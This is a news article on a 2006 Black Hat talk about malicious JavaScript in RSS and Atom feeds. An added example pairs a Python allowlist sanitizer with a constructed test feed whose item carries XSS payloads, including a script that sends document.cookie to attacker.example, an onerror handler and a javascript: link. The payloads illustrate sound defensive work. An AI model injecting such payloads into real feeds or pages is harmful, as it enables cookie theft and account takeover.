RSS, Atom feeds ripe for attack

Black Hat: A researcher demonstrates how RSS and Atom feeds can spread the payload of a zero-day attack. His advice? Subscribe to feeds with care.

LAS VEGAS -- A researcher at Black Hat USA 2006 had a warning for those who subscribe to a growing selection of RSS and Atom feeds: If a Web site is susceptible to a zero-day attack, then its feeds -- and its feed recipients -- may be as well.

Robert Auger, a security engineer for Atlanta-based SPI Dynamics Inc., explained that if a Web site offering RSS and Atom feeds becomes infected with malicious code, not only can its feeds spread the attack, but attackers can also craft their own malicious feeds that appear legitimate.

Therefore, he said, subscribers must assume all feed data is malicious -- even data from trusted feeds to which an end-user may already subscribe -- and take the necessary security precautions.

"You only have to hack a couple of sites' [feeds] and you can hurt a lot of users," Auger said.

Expanding on the description of his talk on the Black Hat Web site, Auger said many RSS clients fail to properly vet the data they receive and so do not guard against malicious or malformed content.

Auger said that as a test he created several feeds, injected JavaScript into some of them, and observed the effects in various readers. He found it possible to conduct a number of malicious activities, including logging keystrokes, stealing cookies and launching cross-site scripting attacks, because the reader rendered the feed's HTML without stripping the script.
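As an added example (not SPI Dynamics' code, nor that of any reader named in this article), the Python below shows both the failure mode and the fix. A constructed RSS 2.0 feed carries one benign item and one item whose description contains the kinds of payloads described above: a cookie-stealing script block, an event-handler attribute on an image, and a javascript: link. The feed is rendered once the way a naive reader does, by passing the raw description straight through, and once through an allowlist HTML sanitizer that keeps only benign tags, drops every attribute not explicitly permitted, and accepts only absolute http(s) URLs in href and src. The feed text, the attacker.example host and all function names are assumptions for this illustration; the same sanitizer applies whether the item was authored at the publishing site or aggregated from a third-party feed or search result.

```python
"""Allowlist sanitizer for HTML carried in RSS/Atom item bodies.

Added example, not code from SPI Dynamics or any feed reader. The feed and
its tainted item are constructed here; attacker.example is a placeholder.
"""
import html
import xml.etree.ElementTree as ET
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed RSS 2.0 document. Item bodies are wrapped in CDATA, as many
# publishers do; the second item carries script, handler and URL payloads.
CONSTRUCTED_FEED = """<?xml version="1.0"?>
<rss version="2.0"><channel><title>Example feed</title>
<item><title>Benign post</title>
<description><![CDATA[<p>Read <a href="https://example.org/post">the post</a>.</p>]]></description>
</item>
<item><title>Tainted post</title>
<description><![CDATA[<p>Hi</p><script>new Image().src="https://attacker.example/?c="+document.cookie</script><img src=x onerror="alert(1)"><a href="javascript:alert(document.cookie)">click</a>]]></description>
</item>
</channel></rss>"""

ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "ul", "ol", "li",
                "a", "img", "blockquote", "code", "pre"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "title"}}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https"}
VOID_TAGS = {"br", "img"}


def safe_url(value: str) -> bool:
    """Accept only absolute http(s) URLs. Rejects javascript:, data:, vbscript:
    and relative URLs (the feed's base URL is itself untrusted)."""
    try:
        parts = urlsplit(value.strip())
    except ValueError:
        return False
    return parts.scheme.lower() in SAFE_SCHEMES and bool(parts.netloc)


class FeedHTMLSanitizer(HTMLParser):
    """Re-serialises a fragment keeping only allowlisted tags/attributes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._skip_depth = 0  # >0 while inside <script>/<style>: text is dropped too

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip_depth += 1
            return
        if self._skip_depth or tag not in ALLOWED_TAGS:
            return  # unknown element: drop the tag, keep its text content
        kept = []
        for name, value in attrs:
            name = name.lower()
            # Allowlist by name: this is what removes on* handlers and style=.
            if value is None or name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name in URL_ATTRS and not safe_url(value):
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        if tag == "img" and not any(k.startswith(" src=") for k in kept):
            return  # an <img> whose src was rejected is dropped entirely
        if tag == "a" and any(k.startswith(" href=") for k in kept):
            kept.append(' rel="noopener noreferrer"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip_depth = max(0, self._skip_depth - 1)
            return
        if self._skip_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip_depth:
            self.out.append(html.escape(data, quote=False))

    def handle_comment(self, data):
        pass  # comments are dropped (conditional comments were a classic vector)


def sanitize_html(fragment: str) -> str:
    parser = FeedHTMLSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


def render_feed(xml_text: str, sanitize: bool = True):
    """Return a list of {'title', 'body'} dicts ready to place in the reader's
    HTML view. sanitize=False models the vulnerable reader behaviour."""
    root = ET.fromstring(xml_text)
    items = []
    for item in root.iter("item"):
        body = item.findtext("description", default="")
        items.append({
            "title": html.escape(item.findtext("title", default="")),
            "body": sanitize_html(body) if sanitize else body,
        })
    return items


if __name__ == "__main__":
    for entry in render_feed(CONSTRUCTED_FEED):
        print(entry["title"], "->", entry["body"])
```

The sanitizer is deliberately an allowlist: anything not named is dropped, so new attribute names or schemes never need to be blocked one at a time. Two caveats for real deployments: parse untrusted XML with defusedxml rather than the stdlib parser, and apply the same treatment to Atom `content` and `summary` elements with `type="html"`, which this example does not cover.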

He noted that many RSS feeds are automatically generated from content originating in third-party feeds, search engine results and other areas, which means feed subscribers can be victimized even if they don't actually subscribe to a feed that's been specifically tainted.

Auger said that as more people use feeds to view news summaries, watch movies, read blogs and download music files, the bad guys have a growing playground from which to launch bots and worms.

An increasing number of electronic publishers have begun offering RSS and Atom feeds as the technology's popularity has grown. The PEW Internet & American Life Project has estimated that as much as 9% of the U.S. Internet population uses feeds, while New York-based JupiterResearch has said that number could be as high as 12%.

In conducting its research, SPI Dynamics found Bloglines, RSS Reader, RSS Owl, FeedDemon and SharpReader to be among the readers vulnerable to attack. Auger noted that Bloglines fixed its vulnerability immediately after it was made aware of the problem.

Auger said he plans to conduct further research into how the feed threat affects P2P applications, podcast clients and DVRs like TiVo. For now, he said, users should be careful when subscribing to RSS and Atom feeds.

"When you get data, you can't assume it's good," Auger said. When choosing to subscribe to a feed, "you have to consider its potential impact and where the data is coming from."
